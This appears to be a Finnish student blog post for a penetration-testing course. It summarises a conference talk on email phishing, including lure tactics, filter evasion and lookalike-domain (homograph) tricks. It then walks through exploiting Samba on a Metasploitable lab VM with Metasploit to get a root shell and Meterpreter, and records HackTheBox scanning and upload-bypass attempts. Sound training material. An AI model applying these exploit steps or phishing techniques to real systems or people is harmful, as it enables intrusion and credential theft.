Penetration testing H5

a) Konfferenssi kotona. Katso jokin esitys pentest-aiheisesta konfferenssista ja kommentoi sen parhaita paloja. Esim. Disoebey, RSA, BlackHat…
b) Metasploitable. Korkkaa jokin uusi palvelu Metasploitablesta (jokin muu kuin vsftpd). Voit käyttää Metasploitable 2 tai 3.
c) HackTheBox, korkkaa jokin kone.

Tehtävät: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

Tehtävät tehdään Kali Linux Xfce 64-Bit käyttöjärjestelmään, joka on avattu Live tilaan muistitikulta.

Tietojenkalastelu sähköpostitse – Nicolas Särökaari

Mikä on tietojen kalastelu

Tietokalastelu on yritys saada arkaluonteisia tietoja, kuten käyttäjätunnuksia, salasanoja ja luottokorttitietoja, peittämällä itsensä luotettavaksi tahoksi, joille ihmiset lähettäisivät tietojaan.

Miksi ihmiset napsauttavat linkkejä

  1. Uteliaisuudesta jos vaikka sähköpostissa lukee, että pakettisi saapuu 30.05.2019 ja et ole tilannut mitään.
  2. Tunnenko lähettäjän, jos vaikka Suomalaiselle lähetetyssä viestissä on suomalainen sukunimi, kuten Virtanen.

Laillisuus

Videossa Nicolas Särökaari mainitsee tietojen käytettävyyden laillisuudesta kohdassa: 04:28 “Data act in Finland actually gives quite good protection against for the users that we have to been doing phishing just due diligence that we have to do that we cannot actually provide any any real data that could be used against those users that actually click the link so only data that you can provide is basically anonymized so they cannot be used against people.” URL: (https://youtu.be/m9YFJGSHYtY?t=268).

Suojaus mekanismit

SPF Sender Policy Framework ja DKIM DomainKeys Indentified Mail: Tunnistaa Domain nimiä ja sähköpostin sisällön.

URL-white listing: Vain tietyt verkkotunnukset ovat sallittuja ja kaikki muu on estetty.

Graylisting: Torjuu uudet viestit lähettäjälle huonetta puolella voi myös estää oikeutetut sähköpostit.

Ohitusmekanismi: Mekanismit tarkistaa verkkotunnuksen Domain nimen maineen mukaan, Sähköpostin otsikot, sähköpostin sisältö ja päättää päästetäänkö sähköposti läpi. Järjestelmän voi kiertää esimerkiksi tekemällä uusia Domain nimiä ja lähettämällä viestit Suomeksi.

IDN Homograph -hyökkäys

Käyttäjän Unicodesta kirjaimia on saman näköisiä sivuja kuin alkuperäinen esim. Kreikan aakkoset “ρ” poe.trade -> ρoe.trade.

Kuva: Kokeilin NameCheap sivulta voiko Domainin ρoe.trade ostaa ja kyllä voi.

Mikä yleensä toimii tietojenkalastelussa

Sähköpostin lähettäminen palvelupisteeseen tai tietotekniikkaosastoon toimii erittäin hyvin ja muut hyvämaineiset myymälät kuten linkedin gmail apple.

Uteliaisuus: Esim. ”Tilaamasi paketti saapuu 30.05.2019”

Kiireellisyyden tunne: Esimerkki koulun sähköpostista ”Olet käyttänyt 98,9% postilaatikkoon osoitetusta datatilasta. Välttääksesi, että saapuvat hierontasi pidetään kiinni tai ne menettävät ne pysyvästi, sinun on tarkistettava postilaatikkoasi laajentaaksesi tietomäärän kokoa. Päivitä postilaatikko valitsemalla VALIDATE”.

Mitä hyötyä

Saada salaisia tietoja suoraan kohde organisaatiosta.

Lähde

Disobey 2018 – Phishing through email – Niklas Särökaari: https://www.youtube.com/watch?v=m9YFJGSHYtY

Metasploitable Vagrant

Asensin Vagrantin komennolla “apt-get install vagrant” ja VirtualBox:n komennolla “apt-get install virtualbox-qt“.

Tein suoraan VagrantCloud sivun käyttäjän rapid7:n komennoilla “vagrant init rapid7/metasploitable3-ub1404“, joka tekee Vagrantfilen ja komennolla “vagrant up“, joka tekee Vagrantfilen mukaan VirtualBoxille virtuaali- koneen. En saanut tätä virtuaali- konetta toimimaan. Löysin vielä opettajan ohjeen tähän samaan koneeseen, mutta sekään ei toiminut.

Aloitin kokeilemaan toista VagrantClouidin käyttäjän Sliim VagrantCloud Metasploitable 2 virtuaali konetta Vagrant Cloudista komennoilla “vagrant init Sliim/metasploitable2 –box-version 2“, lisäsin tiedostoon vielä opetajan sivulta saamani rivit “config.vm.network “private_network”, :type => ‘dhcp’, :adapter => 1“, jotta saan Virtualbox:n erilliseen verkkoon ja komennolla “vagrant up“, tämä virtuaali kone asentui ongelmitta.

Katsoin komennolla “ip route” uuden verkon local osoitteen, joka oli 172.28.128.0/24 nimellä vboxnet0. Komennolla “apt-get install ipcalc” asensin ohjelman, jolla voidaan saada lisätietoa verkon laajuudesta, jos ei sitä tunnista osoitteesta eli komennolla ipcalc 172.28.128.0/24.

Netmaskista 255.255.255.0 voidaan päätellä että, viimeisellä numerolla on liikkuma varaa eli verkon laajuus 172.28.128.1 – 172.28.128.254.

Verkon skannaus

Aloitin alustamalla Metasploit ohjelmaan tietokannan, johon skannaus tiedot tulevat komennolla “msfdb init” ja avasin MetaSploit:n komennolla “msfconsole“.

Skannasin ensin pienen palan verkkoa koska todennäköisesti VirtualBox laitaa koneen local IP avaruuden alkupäähän eli komennolla “db_nmap -n -vvv 172.28.128.1-10 –top-ports 10“, skannasin 10 ensimmäistä IP osoitetta ja etsin top-10 yleisimmillä porteilla. Komennolla services –up sain perus tiedot selville

host ip: 172.28.128.3.

Avonaiset portit: 21tcp, 22tcp , 23tcp, 25tcp, 80tcp, 139tcp ja 445tcp.

Palveluiden nimet: Ftp, SSH, Telnet, Smtp, HTTP, Netbios-Ssn ja Microsoftds.

Suoritin vielä tarkemman skannauksen, että saan versiotietoja ja kaikki avonaiset portit komennolla “db_nmap -n -sC -sV -Pn 172.28.128.3” eli lipulla sC sripti skannaus, lipulla -sV banner grabbing ja lipulla -Pn no ping skannaus. Komennolla services –up sain kaikki palvelut näkyviin syöte alla.

host          port  proto  name         state  info
 ----          ----  -----  ----         -----  ----
 172.28.128.3  21    tcp    ftp          open   vsftpd 2.3.4
 172.28.128.3  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
 172.28.128.3  23    tcp    telnet       open   Linux telnetd
 172.28.128.3  25    tcp    smtp         open   Postfix smtpd
 172.28.128.3  53    tcp    domain       open   ISC BIND 9.4.2
 172.28.128.3  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
 172.28.128.3  111   tcp    rpcbind      open   2 RPC #100000
 172.28.128.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 172.28.128.3  445   tcp    netbios-ssn  open   Samba smbd 3.0.20-Debian workgroup: WORKGROUP
 172.28.128.3  512   tcp    exec         open   netkit-rsh rexecd
 172.28.128.3  513   tcp    login        open   
 172.28.128.3  514   tcp    shell        open   Netkit rshd
 172.28.128.3  1099  tcp    java-rmi     open   Java RMI Registry
 172.28.128.3  1524  tcp    bindshell    open   Metasploitable root shell
 172.28.128.3  2049  tcp    nfs          open   2-4 RPC #100003
 172.28.128.3  2121  tcp    ftp          open   ProFTPD 1.3.1
 172.28.128.3  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
 172.28.128.3  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
 172.28.128.3  5900  tcp    vnc          open   VNC protocol 3.3
 172.28.128.3  6000  tcp    x11          open   access denied
 172.28.128.3  6667  tcp    irc          open   UnrealIRCd
 172.28.128.3  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
 172.28.128.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Suoritin vielä tarkemman skannauksen osoitteeseen 172.28.128.3 MetaSploit:n ulkopuolella, että saan muistion ohjelmisto versioista. Tein ensin teksti tiedoston “3portscan.txt” ja komennolla “nmap -n -sV -sC 172.28.128.3 | tee 3portscan.txt” skannasin portit, lipulla -sV suoritin banner grabing toimintoa, joka hakee ohjelmisto versioita ja lipulla -sC tein skripti skannauksen, jolla saan vielä enemmän tietoa järjestelmästä. Skannauksen tulos alla.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 07:32 UTC
 Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
 Service scan Timing: About 43.48% done; ETC: 07:32 (0:00:08 remaining)
 Nmap scan report for 172.28.128.3
 Host is up (0.00012s latency).
 Not shown: 977 closed ports
 PORT     STATE SERVICE     VERSION
 21/tcp   open  ftp         vsftpd 2.3.4
 |ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst:  |   STAT:  | FTP server status: |      Connected to 172.28.128.1 |      Logged in as ftp |      TYPE: ASCII |      No session bandwidth limit |      Session timeout in seconds is 300 |      Control connection is plain text |      Data connections will be plain text |      vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey:  |  1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
 23/tcp   open  telnet      Linux telnetd
 25/tcp   open  smtp        Postfix smtpd
 |smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,  |_ssl-date: 2019-05-26T07:32:41+00:00; -1s from scanner time. | sslv2:  |   SSLv2 supported |   ciphers:  |     SSL2_RC4_128_WITH_MD5 |     SSL2_DES_64_CBC_WITH_MD5 |     SSL2_DES_192_EDE3_CBC_WITH_MD5 |     SSL2_RC2_128_CBC_WITH_MD5 |     SSL2_RC4_128_EXPORT40_WITH_MD5 |    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 53/tcp   open  domain      ISC BIND 9.4.2
 | dns-nsid: 
 |_  bind.version: 9.4.2
 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
 |http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp  open  rpcbind     2 (RPC #100000) | rpcinfo:  |   program version   port/proto  service |   100000  2            111/tcp  rpcbind |   100000  2            111/udp  rpcbind |   100003  2,3,4       2049/tcp  nfs |   100003  2,3,4       2049/udp  nfs |   100005  1,2,3      43327/udp  mountd |   100005  1,2,3      60161/tcp  mountd |   100021  1,3,4      36359/udp  nlockmgr |   100021  1,3,4      42018/tcp  nlockmgr |   100024  1          47265/udp  status |  100024  1          50493/tcp  status
 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
 512/tcp  open  exec        netkit-rsh rexecd
 513/tcp  open  login
 514/tcp  open  shell       Netkit rshd
 1099/tcp open  java-rmi    Java RMI Registry
 1524/tcp open  bindshell   Metasploitable root shell
 2049/tcp open  nfs         2-4 (RPC #100003)
 2121/tcp open  ftp         ProFTPD 1.3.1
 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
 | mysql-info: 
 |   Protocol: 10
 |   Version: 5.0.51a-3ubuntu5
 |   Thread ID: 8
 |   Capabilities flags: 43564
 |   Some Capabilities: Support41Auth, SupportsTransactions, LongColumnFlag, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
 |   Status: Autocommit
 |_  Salt: wW,t(fIxE.VF>Ajs&`0n
 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
 |ssl-date: 2019-05-26T07:32:41+00:00; -2s from scanner time. 5900/tcp open  vnc         VNC (protocol 3.3) | vnc-info:  |   Protocol version: 3.3 |   Security types:  |    VNC Authentication (2)
 6000/tcp open  X11         (access denied)
 6667/tcp open  irc         UnrealIRCd
 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
 |_ajp-methods: Failed to get a valid response for the OPTION request
 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
 |_http-favicon: Apache Tomcat
 |_http-server-header: Apache-Coyote/1.1
 |_http-title: Apache Tomcat/5.5
 MAC Address: 08:00:27:E1:7D:3B (Oracle VirtualBox virtual NIC)
 Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 Host script results:
 |clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -1s |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC:  (unknown) | smb-os-discovery:  |   OS: Unix (Samba 3.0.20-Debian) |   NetBIOS computer name:  |   Workgroup: WORKGROUP\x00 |  System time: 2019-05-26T03:32:41-04:00
 |_smb2-time: Protocol negotiation failed (SMB2)

Skannauksen tuloksena löytyi vaikka mitä esim. VsFtpd 2.3.4, jolla kokeilin päästä sisään ja pääsin mutta tässä tehtävässä piti tehdä jokin muu kuin Ftp.

Penetration test 172.28.128.3

Katsoin teksti tiedostoa 3portscan.txt ja löysin tarkemman versio numeron Sambasta, jolla on avonainen portti 445 “Samba smbd 3.0.20-Debian”, etsin kyseistä versio numeroa SearchSploitista komennolla “searchsploit -w samba 3.0.20“, joka näyttää myös versio numerot ja websivun, josta lukea lisätietoja. Löysin explotin jossa oli sama versio numero kuin skannaamassani koneessa “Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit)” ja exploit näyttäisi olevan Metasploitissa.

MetaSploitissa komennolla “set RHOSTS 172.28.128.3” laitoin maalitaulu osoitteen, komenolla “search samba” etsin kyseisen explotin löytyi nimellä “exploit/multi/samba/usermap_script – 2007-05-14 – excellent – Samba “username map script” Command Execution” ja laitoin haavoituvuuden käyttöön komennolla “use exploit/multi/samba/usermap_script“. ExploitDB sivun mukaan tällä pitäisi jo päästä suorittamaan komentoja palvelimelle eli seuraavaksi kokeilu.

MetaSploit oletus arvoisesti valitsee toimivan vaihto ehdon hyötykuormalle, katsoin “options” komennolla että sielä oli “cmd/unix/reverse”. Komennolla “exploit” lähetin hyötykuorman, joka ilmoitti “Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:47919) at 2019-05-26 09:25:28 +0000” eli pääsin sisälle koneeseen. Kokeilin vielä terminaali komennolla “w” joka vastasi.

w
05:52:19 up  2:53,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             02:58    2:53   0.00s  0.00s -bash

Upgrade Shell

Laitoin koneen, jonka sain auki taustalle komennolla “background“, valitsin kyseisen session 1 komennolla “set SESSION 1“, etsin kyseiseen sessioon ylennys mahdollisuutta komennolla “search upgrades” ja valitsin uudeksi Shelliksi Meterpreter eli komennolla “use post/multi/manage/shell_to_meterpreter” valitsin kansion nimen mukaan. Komennolla exploit lähetin POST pyynnön sessiolle 1, joka vastasi toiminnon onnistuneen.

[*] Upgrading session ID: 1 [] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.128.1:4433  [] Sending stage (914728 bytes) to 172.28.128.3
[*] Meterpreter session 2 opened (172.28.128.1:4433 -> 172.28.128.3:48622) at 2019-05-26 10:01:13 +0000 [] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

Kokeilin vielä toimivuuden komennolla “sessions 2“, jonka juuri loin –> pääsin sisään ja syötin komennon “ls“, joka toimi oletetusti.

meterpreter > ls
 Listing: /
 Mode              Size     Type  Last modified              Name
 ----              ----     ----  -------------              ----
 40755/rwxr-xr-x   4096     dir   2012-05-14 03:35:33 +0000  bin
 40755/rwxr-xr-x   1024     dir   2012-05-14 03:36:28 +0000  boot
 40755/rwxr-xr-x   4096     dir   2010-03-16 22:55:51 +0000  cdrom

Lopuksi tuhosin vagrant koneen komennolla “vagrant destroy“.

HackTheBoxEu

Tehtävä ei sisällä vastauksia HackTheboxiin.

Liityin HackTheBoxin lähiverkkoon lataamalla HackTheBoxin sivulta nimi.ovpn tiedoston, lataamalla Open-Vpn paketin hallinnasta komennolla “apt-get install openvpn” ja avaamalla lataamani tiedoston Open-Vpn:n kautta komennolla “openvpn nimi.ovpn“.

Komennolla “ip route” katsoin verkon, joka oli HackTheBoxin Scopessa eli 10.10.10.0/24. Latasin ipcalc ohjelman komennolla “apt-get install ipcalc” ja komennolla “ipcalc 10.10.10.0/24“, tarkastan verkon laajuudeen.

Netmaskista 255.255.255.0 voidaan todeta, että viimeisellä numerolla on liikkuma varaa eli olen scoupin mukaisessa verkossa 10.10.10.1 – 10.10.10.254.

Kohteen valinta

Ensin alustin MetaSploit:n tietokannat komennolla “msfdb init“, joka tekee tietokannat, johon esim. Portti skannauksien tulokset, jotka alkaa db_.. menevät. Päivitin viellä exploit versiot MetaSploitille komennolla “apt-get install metasploit-framework“, joka ilmoitti 1 upgraded. Avasin MetaSploit:n komennolla “msfconsole“.

Sain torstaina tuon helpoimman auki eli 10.10.10.152 käyttäjällä ja rootilla eli kokeilen, muita kun tätä.

MetaSploisissa komennolla “db_nmap -vvv -n 10.10.10.100-200 -sV –top-ports 15” sain skannatua alueen 100-200, banner gräbilla ja top 15porteilla.

MetaSploitissa sain komennolla “services –up” auki kaikki skannaamani tiedot suoraan paikallisesta msf tietokannasta.

Services
 host          port  proto  name          state  info
 ----          ----  -----  ----          -----  ----
 10.10.10.101  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 Ubuntu Linux; protocol 2.0
 10.10.10.101  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.101  8080  tcp    http          open   Apache Tomcat/Coyote JSP engine 1.1
 10.10.10.103  21    tcp    ftp           open   Microsoft ftpd
 10.10.10.103  53    tcp    domain        open   
 10.10.10.103  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.103  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.103  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.103  443   tcp    ssl/http      open   Microsoft IIS httpd 10.0
 10.10.10.103  445   tcp    microsoft-ds  open   
 10.10.10.119  22    tcp    ssh           open   OpenSSH 7.4 protocol 2.0
 10.10.10.119  80    tcp    http          open   Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
 10.10.10.120  80    tcp    http          open   Apache httpd 2.4.34 (Ubuntu)
 10.10.10.120  110   tcp    pop3          open   Dovecot pop3d
 10.10.10.120  143   tcp    imap          open   Dovecot imapd Ubuntu
 10.10.10.121  22    tcp    ssh           open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 Ubuntu Linux; protocol 2.0
 10.10.10.121  80    tcp    http          open   Apache httpd 2.4.18 (Ubuntu)
 10.10.10.122  22    tcp    ssh           open   OpenSSH 7.4 protocol 2.0
 10.10.10.122  80    tcp    http          open   Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
 10.10.10.123  21    tcp    ftp           open   vsftpd 3.0.3
 10.10.10.123  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4 Ubuntu Linux; protocol 2.0
 10.10.10.123  53    tcp    domain        open   ISC BIND 9.11.3-1ubuntu1.2 Ubuntu Linux
 10.10.10.123  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.123  139   tcp    netbios-ssn   open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 10.10.10.123  443   tcp    ssl/http      open   Apache httpd 2.4.29
 10.10.10.123  445   tcp    netbios-ssn   open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
 10.10.10.124  22    tcp    ssh           open   
 10.10.10.124  80    tcp    http          open   nginx
 10.10.10.124  443   tcp    ssl/http      open   nginx
 10.10.10.124  8080  tcp    ssl/http      open   nginx
 10.10.10.125  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.125  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.125  445   tcp    microsoft-ds  open   
 10.10.10.126  80    tcp    http          open   nginx 1.10.3
 10.10.10.126  443   tcp    ssl/http      open   nginx 1.10.3
 10.10.10.127  22    tcp    ssh           open   OpenSSH 7.9 protocol 2.0
 10.10.10.127  80    tcp    http          open   OpenBSD httpd
 10.10.10.127  443   tcp    ssl/https     open   
 10.10.10.128  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.129  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
 10.10.10.129  80    tcp    http          open   Apache httpd 2.4.29 (Ubuntu)
 10.10.10.130  80    tcp    http          open   Microsoft IIS httpd 10.0
 10.10.10.130  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.130  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.130  445   tcp    microsoft-ds  open   
 10.10.10.130  8080  tcp    http          open   Apache Tomcat 8.5.37
 10.10.10.131  21    tcp    ftp           open   vsftpd 2.3.4
 10.10.10.131  22    tcp    ssh           open   OpenSSH 7.9 protocol 2.0
 10.10.10.131  80    tcp    http          open   Node.js Express middleware
 10.10.10.131  443   tcp    ssl/http      open   Node.js Express framework
 10.10.10.132  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.132  445   tcp    microsoft-ds  open   
 10.10.10.132  8080  tcp    http-proxy    open   -
 10.10.10.133  22    tcp    ssh           open   OpenSSH 7.4p1 Debian 10+deb9u6 protocol 2.0
 10.10.10.133  80    tcp    http          open   Apache httpd 2.4.25 (Debian)
 10.10.10.134  22    tcp    ssh           open   OpenSSH for_Windows_7.9 protocol 2.0
 10.10.10.134  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.134  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.134  445   tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 10.10.10.139  22    tcp    ssh           open   OpenSSH 7.6p1 Ubuntu 4 Ubuntu Linux; protocol 2.0
 10.10.10.139  80    tcp    http          open   nginx 1.14.0 Ubuntu
 10.10.10.140  22    tcp    ssh           open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
 10.10.10.140  80    tcp    http          open   Apache httpd 2.4.18 (Ubuntu)
 10.10.10.152  21    tcp    ftp           open   Microsoft ftpd
 10.10.10.152  80    tcp    http          open   Indy httpd 18.1.37.13946 Paessler PRTG bandwidth monitor
 10.10.10.152  135   tcp    msrpc         open   Microsoft Windows RPC
 10.10.10.152  139   tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
 10.10.10.152  445   tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Kokeilin osoitteeseen 131 palvelimeen vsftpd 2.3.4, exploittia ja payloadia, mutta ei toiminut, varmaan eri versio kuin nmap portti skannaus ehdottaa. En tiedä mitään Node.jstä niin vaihdoin kohdetta.

Kokeilin saada Magenton kauppa palvelua ylläpitävää 10.10.10.140/ auki monta tuntia enkä saanut. Kokeilin mm. Tarkempaa portti skannausta, DIRB Web content scanneria, exploitteja, hyötykuormia, SQL injectiota.. Löysin hyötykuorman, joka saattaisi toimia mutta se oli koodattu Pythonilla enkä saanut lisättyä sitä MetaSploitiin. Vaihdoin tässä vaiheessa virkistyksen vuoksi kohdetta.

Palvelimelta 10.10.10.121 sain selville DIRB skannauksella, että se hostaa osoitteessa 10.10.10.121/support/ HelpDeskZ ohjelmistoa. Sain myös selville, että kyseisessä palvelun versiossa voi lähettää php tiedostoja “submit a ticket” osiossa lähettämällä, jotain muuta ensin esim kuva.jpg tiedoston ja interceptillä vaihtaa kuvan kuva.php tiedostoon. En saanut ajan puitteissa toimimaan ja MitmProxyllä tämä ei onnistunut pitää varmaan käyttää, jotain muuta kuten Burpsuitea jota en vielä osaa käyttää. Hyöty kuorma sivulta: https://www.exploit-db.com/exploits/41200/ eli searchsplotista.

Vaikka vaihtelen kohteita pidän kirjaa kaikista portti skannauksista, DIRB skannauksista ja havainnoista.

Lähteet

Pohjana Tero Karvinen 2019: Penetration Testing kurssi, http://terokarvinen.com

Tehtävät:  http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Vagrant Virtuaali kone: https://app.vagrantup.com/rapid7/boxes/metasploitable3-ub1404

Vagrant Virtuaali kone2: https://app.vagrantup.com/Sliim/boxes/metasploitable2

Samba exploit: https://www.exploit-db.com/exploits/16320

Disobey 2018 – Phishing through email – Niklas Särökaari: https://www.youtube.com/watch?v=m9YFJGSHYtY

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s